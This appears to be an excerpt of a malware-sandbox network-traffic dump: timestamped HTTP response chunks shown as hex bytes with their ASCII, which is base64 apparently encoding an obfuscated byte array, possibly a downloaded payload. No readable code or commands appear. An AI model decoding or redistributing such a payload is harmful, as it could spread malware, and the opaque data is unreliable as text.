                                      2021-12-02 17:36:08 UTC11INData Raw: 79 78 67 52 6b 55 73 59 44 4d 32 4c 47 42 43 52 69 78 67 52 54 55 73 59 45 46 47 4c 47 41 30 4e 79 78 67 52 55 59 73 59 45 56 44 4c 47 42 47 52 53 78 67 4e 54 51 73 59 45 5a 45 4c 47 41 30 52 69 78 67 4e 7a 63 73 59 45 52 46 4c 47 42 47 4f 53 78 67 4d 54 4d 73 59 45 59 77 4c 47 42 44 52 53 78 67 52 6b 59 73 59 45 59 79 4c 47 42 47 51 53 78 67 4d 55 59 73 59 45 59 34 4c 47 42 46 4e 79 78 67 52 44 4d 73 59 44 64 47 4c 47 42 47 52 43 78 67 52 44 63 73 59 45 59 35 4c 47 42 47 51 69 78 67 52 6b 59 73 59 44 63 79 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 56 45 4c 47 42 45 52 69 78 67 4d 6a 41 73 59 45 5a 45 4c 47 41 31 4e 53 78 67 51 30 49 73 59 45 51 35 4c 47 41 32 52 69 78 67 51 30 55 73 59 45 5a 44 4c 47 42 43 4d 53 78 67 52 6b 51 73 59 44 55 7a 4c 47 42 47
                                      Data Ascii: yxgRkUsYDM2LGBCRixgRTUsYEFGLGA0NyxgRUYsYEVDLGBGRSxgNTQsYEZELGA0RixgNzcsYERFLGBGOSxgMTMsYEYwLGBDRSxgRkYsYEYyLGBGQSxgMUYsYEY4LGBFNyxgRDMsYDdGLGBGRCxgRDcsYEY5LGBGQixgRkYsYDcyLGBGRixgOUQsYEVELGBERixgMjAsYEZELGA1NSxgQ0IsYEQ5LGA2RixgQ0UsYEZDLGBCMSxgRkQsYDUzLGBG
                                      2021-12-02 17:36:08 UTC12INData Raw: 4e 43 4c 47 42 47 4f 53 78 67 51 54 6b 73 59 45 52 47 4c 47 42 47 51 79 78 67 4d 6a 6b 73 59 44 68 45 4c 47 41 78 52 69 78 67 51 6a 41 73 59 45 5a 47 4c 47 42 42 51 53 78 67 4e 30 59 73 59 45 59 77 4c 47 42 45 4f 53 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 45 56 43 4c 47 41 35 52 69 78 67 4d 45 4d 73 59 45 45 32 4c 47 41 32 4e 79 78 67 52 54 63 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4e 7a 55 73 59 44 64 47 4c 47 42 45 51 69 78 67 52 45 59 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6b 4d 73 59 44 63 31 4c 47 42 42 4f 53 78 67 52 54 55 73 59 45 4e 46 4c 47 41 30 52 69 78 67 52 44 55 73 59 44 64 47 4c 47 41 32 4d 53 78 67 51 54 63 73 59 44 67 7a 4c 47 42 47 52 69 78 67 52 55 55 73 59 44 64 47 4c 47 42 42 4e 79 78 67 4d 45 55 73 59
                                      Data Ascii: NCLGBGOSxgQTksYERGLGBGQyxgMjksYDhELGAxRixgQjAsYEZGLGBBQSxgN0YsYEYwLGBEOSxgRjMsYEY0LGBGMyxgM0YsYEVCLGA5RixgMEMsYEE2LGA2NyxgRTcsYDM3LGBGRixgNzUsYDdGLGBEQixgREYsYEZCLGBCNyxgRkMsYDc1LGBBOSxgRTUsYENFLGA0RixgRDUsYDdGLGA2MSxgQTcsYDgzLGBGRixgRUUsYDdGLGBBNyxgMEUsY
                                      2021-12-02 17:36:08 UTC13INData Raw: 67 52 55 49 73 59 45 4a 47 4c 47 42 47 52 53 78 67 52 6a 45 73 59 44 5a 47 4c 47 41 35 4d 43 78 67 52 6b 55 73 59 44 5a 45 4c 47 42 43 52 69 78 67 51 30 59 73 59 44 64 47 4c 47 41 35 4e 53 78 67 4d 7a 4d 73 59 45 51 33 4c 47 41 33 52 53 78 67 52 6b 4d 73 59 44 55 7a 4c 47 42 47 4e 53 78 67 52 55 59 73 59 45 52 46 4c 47 41 33 4f 53 78 67 52 6a 45 73 59 44 4a 47 4c 47 42 47 51 79 78 67 4e 54 55 73 59 45 51 77 4c 47 41 31 4d 43 78 67 52 6b 59 73 59 45 59 7a 4c 47 41 7a 52 69 78 67 51 6a 51 73 59 44 64 43 4c 47 42 45 4e 79 78 67 52 54 4d 73 59 45 45 78 4c 47 41 7a 52 69 78 67 4d 44 59 73 59 45 51 77 4c 47 41 34 51 53 78 67 4e 55 59 73 59 45 59 77 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 46 45 4c 47 42 46 4f 53 78 67 4d 55 59 73 59 45 5a 42 4c 47 41 31 52 69
                                      Data Ascii: gRUIsYEJGLGBGRSxgRjEsYDZGLGA5MCxgRkUsYDZELGBCRixgQ0YsYDdGLGA5NSxgMzMsYEQ3LGA3RSxgRkMsYDUzLGBGNSxgRUYsYERFLGA3OSxgRjEsYDJGLGBGQyxgNTUsYEQwLGA1MCxgRkYsYEYzLGAzRixgQjQsYDdCLGBENyxgRTMsYEExLGAzRixgMDYsYEQwLGA4QSxgNUYsYEYwLGA5QixgRkUsYEFELGBFOSxgMUYsYEZBLGA1Ri
                                      2021-12-02 17:36:08 UTC15INData Raw: 4c 47 42 45 52 69 78 67 52 54 41 73 59 45 59 33 4c 47 41 77 4e 69 78 67 51 54 6b 73 59 44 64 46 4c 47 41 34 51 69 78 67 4f 55 59 73 59 45 46 42 4c 47 42 47 52 69 78 67 52 6a 49 73 59 45 4e 46 4c 47 41 34 51 69 78 67 51 6b 59 73 59 44 45 77 4c 47 41 79 52 69 78 67 4d 30 55 73 59 44 4a 42 4c 47 41 33 52 53 78 67 51 55 51 73 59 44 64 47 4c 47 41 79 4f 43 78 67 52 6b 51 73 59 44 52 45 4c 47 41 77 52 53 78 67 51 6b 55 73 59 45 59 7a 4c 47 42 42 51 69 78 67 52 6b 4d 73 59 44 45 33 4c 47 41 33 52 69 78 67 4e 45 59 73 59 44 41 34 4c 47 42 45 4e 69 78 67 52 55 59 73 59 45 59 35 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 45 52 47 4c 47 42 45 51 69 78 67 4e 7a 6b 73 59 45 55 7a 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 44 52 42 4c 47 41 33 51 53 78 67 52 54 4d 73 59 45 51
                                      Data Ascii: LGBERixgRTAsYEY3LGAwNixgQTksYDdFLGA4QixgOUYsYEFBLGBGRixgRjIsYENFLGA4QixgQkYsYDEwLGAyRixgM0UsYDJBLGA3RSxgQUQsYDdGLGAyOCxgRkQsYDRELGAwRSxgQkUsYEYzLGBBQixgRkMsYDE3LGA3RixgNEYsYDA4LGBENixgRUYsYEY5LGA1MyxgRjUsYERGLGBEQixgNzksYEUzLGA5NyxgRkYsYDRBLGA3QSxgRTMsYEQ
                                      2021-12-02 17:36:08 UTC16INData Raw: 44 59 73 59 45 4a 46 4c 47 41 30 51 69 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 43 52 43 78 67 4d 30 59 73 59 45 59 33 4c 47 42 46 52 69 78 67 4e 45 45 73 59 45 56 47 4c 47 42 47 52 53 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 46 4d 43 78 67 4e 30 59 73 59 45 56 44 4c 47 41 34 4d 79 78 67 52 6b 4d 73 59 45 52 45 4c 47 41 33 52 69 78 67 4f 44 4d 73 59 44 56 47 4c 47 41 35 52 69 78 67 4e 7a 6b 73 59 45 59 33 4c 47 41 33 4e 79 78 67 52 6b 59 73 59 45 45 35 4c 47 42 47 51 53 78 67 52 6a 63 73 59 45 55 34 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 45 51 7a 4c 47 42 46 4f 53 78 67 4d 6a 55 73 59 44 45 79 4c 47 42 43 4e 53 78 67 52 6a 51 73 59 45 45 33 4c 47 41 33 52 69 78 67 52 6a 41 73 59 44 51 33 4c 47 41 7a 52 53 78 67 52 6b 4d 73 59 45 4a 47 4c 47 41 33 52 53 78 67
                                      Data Ascii: DYsYEJFLGA0QixgRkYsYEIzLGBCRCxgM0YsYEY3LGBFRixgNEEsYEVGLGBGRSxgRkQsYEZGLGBFMCxgN0YsYEVDLGA4MyxgRkMsYERELGA3RixgODMsYDVGLGA5RixgNzksYEY3LGA3NyxgRkYsYEE5LGBGQSxgRjcsYEU4LGAwMCxgRkMsYEQzLGBFOSxgMjUsYDEyLGBCNSxgRjQsYEE3LGA3RixgRjAsYDQ3LGAzRSxgRkMsYEJGLGA3RSxg
                                      2021-12-02 17:36:08 UTC17INData Raw: 41 33 52 53 78 67 52 6b 45 73 59 44 4d 33 4c 47 42 47 52 43 78 67 4e 44 6b 73 59 44 64 47 4c 47 42 47 4e 79 78 67 4d 30 59 73 59 45 55 33 4c 47 42 43 52 69 78 67 52 6a 51 73 59 44 46 43 4c 47 42 47 52 69 78 67 4d 7a 59 73 59 44 45 34 4c 47 42 46 51 53 78 67 4e 6b 59 73 59 45 5a 44 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 44 4e 47 4c 47 42 45 52 53 78 67 4e 7a 6b 73 59 45 55 31 4c 47 41 78 4e 79 78 67 52 54 41 73 59 44 6b 31 4c 47 42 43 52 69 78 67 52 54 4d 73 59 45 4e 47 4c 47 42 47 52 69 78 67 4d 44 63 73 59 44 64 47 4c 47 42 47 4e 79 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 30 49 73 59 45 52 43 4c 47 41 7a 52 69 78 67 51 30 4d 73 59 44 64 47 4c 47 42 46 4e 53 78 67 4e 7a 63 73 59 45 59 35 4c 47 42 47 4e 53 78 67 52 44 4d 73 59 45 52 47 4c
                                      Data Ascii: A3RSxgRkEsYDM3LGBGRCxgNDksYDdGLGBGNyxgM0YsYEU3LGBCRixgRjQsYDFCLGBGRixgMzYsYDE4LGBFQSxgNkYsYEZDLGA1MyxgRjUsYDNGLGBERSxgNzksYEU1LGAxNyxgRTAsYDk1LGBCRixgRTMsYENGLGBGRixgMDcsYDdGLGBGNyxgRjQsYDM3LGBGOSxgN0IsYERCLGAzRixgQ0MsYDdGLGBFNSxgNzcsYEY5LGBGNSxgRDMsYERGL
                                      2021-12-02 17:36:08 UTC19INData Raw: 73 59 45 59 78 4c 47 42 42 4e 79 78 67 52 44 49 73 59 44 68 43 4c 47 42 47 4e 53 78 67 52 45 59 73 59 44 46 43 4c 47 41 33 51 79 78 67 52 6a 67 73 59 44 56 43 4c 47 42 47 52 53 78 67 51 54 59 73 59 45 55 35 4c 47 42 45 52 53 78 67 4d 55 59 73 59 45 5a 43 4c 47 41 77 4e 79 78 67 4d 54 59 73 59 44 49 79 4c 47 42 43 4d 79 78 67 51 6b 59 73 59 44 45 35 4c 47 42 43 52 43 78 67 52 6a 59 73 59 44 6c 43 4c 47 42 47 52 53 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4f 55 49 73 59 44 59 31 4c 47 41 77 4e 79 78 67 51 7a 55 73 59 44 4a 47 4c 47 41 31 4d 79 78 67 4f 45 4d 73 59 45 55 33 4c 47 41 35 52 69 78 67 4e 30 59 73 59 45 59 33 4c 47 41 7a 52 53 78 67 4d 7a 41 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4d 55 59 73 59 45 5a 45 4c 47 42 45 4e 43 78 67 51 6b
                                      Data Ascii: sYEYxLGBBNyxgRDIsYDhCLGBGNSxgREYsYDFCLGA3QyxgRjgsYDVCLGBGRSxgQTYsYEU5LGBERSxgMUYsYEZCLGAwNyxgMTYsYDIyLGBCMyxgQkYsYDE5LGBCRCxgRjYsYDlCLGBGRSxgRDQsYDZGLGBGRSxgOUIsYDY1LGAwNyxgQzUsYDJGLGA1MyxgOEMsYEU3LGA5RixgN0YsYEY3LGAzRSxgMzAsYEZFLGBCRixgMUYsYEZELGBENCxgQk
                                      2021-12-02 17:36:08 UTC20INData Raw: 4f 53 78 67 4d 30 51 73 59 44 4d 77 4c 47 42 46 51 69 78 67 4e 6b 59 73 59 45 5a 45 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 45 5a 47 4c 47 41 78 4f 43 78 67 4e 7a 51 73 59 44 6b 79 4c 47 41 78 52 43 78 67 52 6b 4d 73 59 45 4d 31 4c 47 41 33 4f 43 78 67 52 6a 55 73 59 45 59 7a 4c 47 42 45 52 69 78 67 52 6a 67 73 59 45 5a 47 4c 47 42 47 51 53 78 67 51 6b 51 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 6a 45 73 59 44 45 33 4c 47 42 47 52 69 78 67 4e 6a 45 73 59 44 68 45 4c 47 42 47 52 69 78 67 52 55 45 73 59 45 56 47 4c 47 41 35 4d 43 78 67 51 6b 55 73 59 45 5a 42 4c 47 42 44 52 43 78 67 52 6b 59 73 59 45 4e 42 4c 47 41 33 52 69 78 67 4d 55 49 73 59 45 45 79 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 5a 44 4c 47 41 31 4e 43 78 67 52 6b 51 73 59 44 5a 43 4c 47 42
                                      Data Ascii: OSxgM0QsYDMwLGBFQixgNkYsYEZELGA1MyxgRjUsYEZGLGAxOCxgNzQsYDkyLGAxRCxgRkMsYEM1LGA3OCxgRjUsYEYzLGBERixgRjgsYEZGLGBGQSxgQkQsYEQyLGA3RixgRjEsYDE3LGBGRixgNjEsYDhELGBGRixgRUEsYEVGLGA5MCxgQkUsYEZBLGBDRCxgRkYsYENBLGA3RixgMUIsYEEyLGBGNyxgM0IsYEZDLGA1NCxgRkQsYDZCLGB
                                      2021-12-02 17:36:08 UTC21INData Raw: 45 59 33 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 4d 31 4c 47 41 33 52 53 78 67 4f 45 59 73 59 45 52 47 4c 47 41 35 4d 69 78 67 52 45 45 73 59 45 4e 46 4c 47 41 33 52 53 78 67 4f 45 51 73 59 44 56 47 4c 47 42 46 4d 79 78 67 4f 55 59 73 59 44 49 77 4c 47 41 31 4f 43 78 67 4f 45 59 73 59 44 64 47 4c 47 42 45 4e 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 56 43 4c 47 41 77 4f 43 78 67 52 55 55 73 59 45 51 35 4c 47 42 44 4e 53 78 67 51 55 59 73 59 45 59 78 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 6b 79 4c 47 41 79 4f 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 45 52 53 78 67 52 45 51 73 59 45 45 33 4c 47 42 46 52 69 78 67 4e 30 55 73 59 44 5a 45 4c 47 42 47 51 53 78 67 52 6a 6b 73 59 44 63 33 4c 47 42 46 52 43 78 67 52 44 4d 73
                                      Data Ascii: EY3LGBENyxgRjgsYDM1LGA3RSxgOEYsYERGLGA5MixgREEsYENFLGA3RSxgOEQsYDVGLGBFMyxgOUYsYDIwLGA1OCxgOEYsYDdGLGBENyxgNUYsYEUzLGBENyxgRjgsYDVCLGAwOCxgRUUsYEQ5LGBDNSxgQUYsYEYxLGA2QixgRkMsYDkyLGAyOSxgRkQsYDlGLGBERSxgREQsYEE3LGBFRixgN0UsYDZELGBGQSxgRjksYDc3LGBFRCxgRDMs
                                      2021-12-02 17:36:08 UTC23INData Raw: 78 67 4e 30 59 73 59 45 56 44 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 68 45 4c 47 41 31 52 69 78 67 4e 6a 4d 73 59 44 64 42 4c 47 41 30 51 79 78 67 52 54 6b 73 59 44 42 45 4c 47 42 44 4d 69 78 67 4e 30 49 73 59 44 68 43 4c 47 41 33 52 53 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4e 6b 49 73 59 45 5a 44 4c 47 41 33 4d 53 78 67 4e 7a 63 73 59 45 45 34 4c 47 41 30 52 69 78 67 51 54 49 73 59 45 55 31 4c 47 41 78 52 69 78 67 52 6b 59 73 59 44 6c 43 4c 47 41 31 4d 43 78 67 4e 6b 4d 73 59 45 5a 45 4c 47 41 33 51 69 78 67 52 44 45 73 59 45 52 47 4c 47 42 43 52 69 78 67 52 55 51 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4e 6b 49 73 59 45 5a 44 4c 47 41 7a 4e 69 78 67 52 6a 51 73 59 45 51 35 4c 47 41 32 52
                                      Data Ascii: xgN0YsYEVDLGAyNyxgN0UsYDhELGA1RixgNjMsYDdBLGA0QyxgRTksYDBELGBDMixgN0IsYDhCLGA3RSxgRkUsYDA2LGBCRixgRkIsYEFGLGBGMSxgNkIsYEZDLGA3MSxgNzcsYEE4LGA0RixgQTIsYEU1LGAxRixgRkYsYDlCLGA1MCxgNkMsYEZELGA3QixgRDEsYERGLGBCRixgRUQsYEFGLGBGMSxgNkIsYEZDLGAzNixgRjQsYEQ5LGA2R
                                      2021-12-02 17:36:08 UTC24INData Raw: 44 4c 47 41 78 51 53 78 67 51 6b 59 73 59 45 4e 47 4c 47 41 79 4d 79 78 67 51 54 49 73 59 44 4e 43 4c 47 42 47 4d 53 78 67 51 7a 51 73 59 45 5a 47 4c 47 41 30 4f 43 78 67 51 6a 67 73 59 45 5a 44 4c 47 42 46 4f 53 78 67 4d 44 51 73 59 45 56 47 4c 47 41 35 52 69 78 67 51 54 41 73 59 45 4e 47 4c 47 42 47 52 53 78 67 4e 44 67 73 59 44 5a 42 4c 47 41 35 4d 79 78 67 52 44 41 73 59 44 56 44 4c 47 42 47 52 43 78 67 4d 54 6b 73 59 45 4a 47 4c 47 41 77 4d 79 78 67 51 30 51 73 59 45 52 45 4c 47 41 78 4e 79 78 67 51 7a 51 73 59 44 55 33 4c 47 41 7a 4e 43 78 67 4d 6a 63 73 59 45 5a 47 4c 47 41 77 4f 43 78 67 4e 30 51 73 59 45 59 32 4c 47 41 35 51 69 78 67 52 6b 59 73 59 44 45 32 4c 47 42 43 52 69 78 67 51 7a 59 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4d 54 55 73 59 45
                                      Data Ascii: DLGAxQSxgQkYsYENGLGAyMyxgQTIsYDNCLGBGMSxgQzQsYEZGLGA0OCxgQjgsYEZDLGBFOSxgMDQsYEVGLGA5RixgQTAsYENGLGBGRSxgNDgsYDZBLGA5MyxgRDAsYDVDLGBGRCxgMTksYEJGLGAwMyxgQ0QsYERELGAxNyxgQzQsYDU3LGAzNCxgMjcsYEZGLGAwOCxgN0QsYEY2LGA5QixgRkYsYDE2LGBCRixgQzYsYEFGLGBGMSxgMTUsYE
                                      2021-12-02 17:36:08 UTC25INData Raw: 52 55 59 73 59 44 4e 47 4c 47 41 79 4d 53 78 67 51 6b 55 73 59 45 5a 45 4c 47 41 78 4e 79 78 67 4e 6a 6b 73 59 44 68 44 4c 47 41 35 4e 79 78 67 51 7a 51 73 59 44 52 43 4c 47 41 33 52 69 78 67 4d 6b 51 73 59 44 64 45 4c 47 42 47 4e 69 78 67 4d 55 59 73 59 45 4a 46 4c 47 42 47 4f 53 78 67 4d 7a 55 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6b 59 73 59 44 67 7a 4c 47 41 33 4f 43 78 67 4e 6b 49 73 59 44 52 46 4c 47 41 35 52 69 78 67 52 6b 59 73 59 45 4e 43 4c 47 42 44 4e 43 78 67 4e 7a 63 73 59 45 4a 47 4c 47 41 34 4d 69 78 67 4e 6a 41 73 59 45 5a 47 4c 47 41 31 4e 69 78 67 4d 7a 51 73 59 45 55 32 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 59 77 4c 47 42 47 52 43 78 67 4f 55 55 73 59 45 59 30 4c 47 42 47 51 69 78 67 4d 6b 59 73 59 44 49 31 4c 47 41 31 52 53 78
                                      Data Ascii: RUYsYDNGLGAyMSxgQkUsYEZELGAxNyxgNjksYDhDLGA5NyxgQzQsYDRCLGA3RixgMkQsYDdELGBGNixgMUYsYEJFLGBGOSxgMzUsYDdFLGA4RCxgRkYsYDgzLGA3OCxgNkIsYDRFLGA5RixgRkYsYENCLGBDNCxgNzcsYEJGLGA4MixgNjAsYEZGLGA1NixgMzQsYEU2LGBGRixgOTEsYDYwLGBGRCxgOUUsYEY0LGBGQixgMkYsYDI1LGA1RSx
                                      2021-12-02 17:36:08 UTC27INData Raw: 47 41 33 4e 69 78 67 52 44 63 73 59 44 4d 30 4c 47 42 42 52 69 78 67 4e 30 59 73 59 44 4e 47 4c 47 42 43 4e 53 78 67 4d 7a 6b 73 59 44 41 7a 4c 47 42 45 52 69 78 67 4d 54 41 73 59 44 52 46 4c 47 41 33 52 69 78 67 4d 45 45 73 59 45 51 78 4c 47 42 46 4d 43 78 67 4e 55 49 73 59 45 4d 30 4c 47 42 47 52 69 78 67 4d 45 59 73 59 44 67 34 4c 47 41 31 4e 79 78 67 52 6b 59 73 59 44 42 47 4c 47 42 44 4d 69 78 67 52 55 59 73 59 44 42 43 4c 47 42 46 4d 69 78 67 52 45 59 73 59 44 6c 47 4c 47 41 79 4d 43 78 67 52 45 55 73 59 45 5a 42 4c 47 42 46 4e 79 78 67 4f 44 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 45 45 73 59 44 4e 47 4c 47 41 34 4d 43 78 67 4e 7a 67 73 59 44 6b 78 4c 47 41 32 4e 43 78 67 52 55 59 73 59 44 5a 47 4c 47 42 42 4e 79 78 67 52 6a 6b 73 59 44 4e 43
                                      Data Ascii: GA3NixgRDcsYDM0LGBBRixgN0YsYDNGLGBCNSxgMzksYDAzLGBERixgMTAsYDRFLGA3RixgMEEsYEQxLGBFMCxgNUIsYEM0LGBGRixgMEYsYDg4LGA1NyxgRkYsYDBGLGBDMixgRUYsYDBCLGBFMixgREYsYDlGLGAyMCxgREUsYEZBLGBFNyxgODgsYEY3LGBGRixgREEsYDNGLGA4MCxgNzgsYDkxLGA2NCxgRUYsYDZGLGBBNyxgRjksYDNC
                                      2021-12-02 17:36:08 UTC28INData Raw: 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 4d 54 45 73 59 45 4a 45 4c 47 42 42 52 53 78 67 51 54 67 73 59 45 56 45 4c 47 41 32 52 69 78 67 4e 44 6b 73 59 45 49 30 4c 47 42 47 4f 43 78 67 51 54 4d 73 59 45 45 35 4c 47 42 46 52 43 78 67 4e 55 59 73 59 44 51 32 4c 47 41 7a 51 79 78 67 52 6a 63 73 59 44 68 43 4c 47 41 77 4f 43 78 67 51 30 55 73 59 45 4a 47 4c 47 41 30 4e 69 78 67 52 6a 4d 73 59 45 59 35 4c 47 42 42 52 69 78 67 52 44 41 73 59 45 4a 44 4c 47 42 47 52 69 78 67 4d 7a 49 73 59 45 45 79 4c 47 42 46 52 43 78 67 4d 55 59 73 59 44 51 31 4c 47 42 43 51 79 78 67 52 6a 67 73 59 45 56 47 4c 47 41 78 4d 69 78 67 4d 45 51 73 59 45 5a 46 4c 47 41 7a 4e 69 78 67 52 54 49 73 59 45 56 47 4c 47 42 47 52 69 78 67 4f 55 4d 73 59 45 59 77 4c 47 42 47 51 79 78 67 52
                                      Data Ascii: YsYEZELGBFQixgMTEsYEJELGBBRSxgQTgsYEVELGA2RixgNDksYEI0LGBGOCxgQTMsYEE5LGBFRCxgNUYsYDQ2LGAzQyxgRjcsYDhCLGAwOCxgQ0UsYEJGLGA0NixgRjMsYEY5LGBBRixgRDAsYEJDLGBGRixgMzIsYEEyLGBFRCxgMUYsYDQ1LGBCQyxgRjgsYEVGLGAxMixgMEQsYEZFLGAzNixgRTIsYEVGLGBGRixgOUMsYEYwLGBGQyxgR
                                      2021-12-02 17:36:08 UTC29INData Raw: 44 52 53 78 67 51 6b 59 73 59 45 4d 7a 4c 47 42 45 4d 69 78 67 4d 7a 63 73 59 45 4d 7a 4c 47 41 34 51 69 78 67 52 45 59 73 59 45 5a 44 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 56 45 4c 47 41 33 4e 69 78 67 52 55 49 73 59 45 52 47 4c 47 41 35 51 53 78 67 52 55 4d 73 59 45 56 47 4c 47 41 31 52 69 78 67 52 6a 49 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 47 4f 53 78 67 4f 44 49 73 59 44 4d 79 4c 47 41 34 51 79 78 67 4d 55 51 73 59 44 55 7a 4c 47 42 47 51 79 78 67 51 54 63 73 59 44 49 79 4c 47 41 34 51 79 78 67 52 6b 4d 73 59 44 63 7a 4c 47 41 33 52 69 78 67 4f 55 59 73 59 44 4e 47 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 63 30 4c 47 42 47 52 53 78 67 4d 55 49 73 59 45 5a 44 4c 47 41 32 51 69 78 67 4e 55 59 73 59 44 63 35 4c 47
                                      Data Ascii: DRSxgQkYsYEMzLGBEMixgMzcsYEMzLGA4QixgREYsYEZDLGAzNyxgRkUsYDVELGA3NixgRUIsYERGLGA5QSxgRUMsYEVGLGA1RixgRjIsYDlCLGBGRixgNjYsYEJGLGBGOSxgODIsYDMyLGA4QyxgMUQsYDUzLGBGQyxgQTcsYDIyLGA4QyxgRkMsYDczLGA3RixgOUYsYDNGLGBFQyxgOEIsYDc0LGBGRSxgMUIsYEZDLGA2QixgNUYsYDc5LG
                                      2021-12-02 17:36:08 UTC31INData Raw: 59 44 4d 32 4c 47 42 42 52 69 78 67 4e 30 59 73 59 44 51 79 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 56 45 4c 47 41 35 52 43 78 67 52 44 63 73 59 44 64 47 4c 47 41 77 4d 53 78 67 4e 55 55 73 59 45 5a 47 4c 47 41 32 52 43 78 67 52 6b 55 73 59 45 4a 45 4c 47 42 43 52 69 78 67 52 6a 41 73 59 45 56 47 4c 47 41 30 4f 53 78 67 4f 55 49 73 59 44 4e 47 4c 47 42 47 52 69 78 67 52 45 59 73 59 45 49 35 4c 47 42 47 4e 43 78 67 51 7a 63 73 59 44 4e 45 4c 47 42 42 4d 79 78 67 52 6a 6b 73 59 45 52 42 4c 47 42 43 4d 69 78 67 52 6a 4d 73 59 44 4d 31 4c 47 42 42 4d 79 78 67 51 55 4d 73 59 44 55 79 4c 47 42 46 4e 79 78 67 52 44 55 73 59 45 5a 47 4c 47 41 78 4e 43 78 67 4d 44 45 73 59 45 55 78 4c 47 41 79 52 69 78 67 52 6b 55 73 59 45 55 35 4c 47 42 45 52 69 78 67 52 54 55
                                      Data Ascii: YDM2LGBBRixgN0YsYDQyLGBBRixgRkYsYEVELGA5RCxgRDcsYDdGLGAwMSxgNUUsYEZGLGA2RCxgRkUsYEJELGBCRixgRjAsYEVGLGA0OSxgOUIsYDNGLGBGRixgREYsYEI5LGBGNCxgQzcsYDNELGBBMyxgRjksYERBLGBCMixgRjMsYDM1LGBBMyxgQUMsYDUyLGBFNyxgRDUsYEZGLGAxNCxgMDEsYEUxLGAyRixgRkUsYEU5LGBERixgRTU
                                      2021-12-02 17:36:08 UTC32INData Raw: 53 78 67 4f 55 49 73 59 44 64 47 4c 47 41 77 51 69 78 67 52 45 55 73 59 45 5a 44 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 49 7a 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 4e 79 78 67 4e 30 4d 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 51 79 78 67 4e 44 4d 73 59 44 67 35 4c 47 42 45 4e 69 78 67 4f 55 59 73 59 45 51 33 4c 47 42 43 52 69 78 67 51 6b 59 73 59 45 4a 46 4c 47 42 47 51 53 78 67 4f 44 63 73 59 44 55 79 4c 47 41 34 4d 69 78 67 51 54 67 73 59 45 59 7a 4c 47 42 46 51 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 43 78 67 4d 7a 55 73 59 45 5a 47 4c 47 42 45 4f 53 78 67 4f 54 63 73 59 45 59 33 4c 47 42 45 4d 69 78 67 51 6b 59 73 59 45 56 43 4c 47 42 43
                                      Data Ascii: SxgOUIsYDdGLGAwQixgREUsYEZDLGA1QixgRkUsYDgzLGBFRixgRkUsYDIzLGBFOSxgNUYsYEYyLGBENyxgN0MsYEZCLGBCNyxgRjQsYERGLGBGQyxgNDMsYDg5LGBENixgOUYsYEQ3LGBCRixgQkYsYEJFLGBGQSxgODcsYDUyLGA4MixgQTgsYEYzLGBFQSxgMTUsYDVFLGBGRCxgMzUsYEZGLGBEOSxgOTcsYEY3LGBEMixgQkYsYEVCLGBC
                                      2021-12-02 17:36:08 UTC33INData Raw: 4d 7a 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 44 52 47 4c 47 41 77 52 53 78 67 4e 7a 41 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 4f 44 67 73 59 45 49 7a 4c 47 41 33 52 53 78 67 4f 54 63 73 59 45 52 47 4c 47 42 45 51 53 78 67 52 6a 45 73 59 45 4d 32 4c 47 41 35 52 69 78 67 4e 44 41 73 59 44 4d 34 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6a 67 73 59 45 5a 42 4c 47 42 43 52 69 78 67 4f 44 51 73 59 44 63 34 4c 47 42 47 4e 53 78 67 4d 7a 63 73 59 44 55 35 4c 47 41 33 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 56 43 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 45 49 78 4c 47 42 43 52 69 78 67 4d 44 51 73 59 45 59 78 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 49 32 4c 47 42 43 52 69 78 67 4d 55 59 73 59
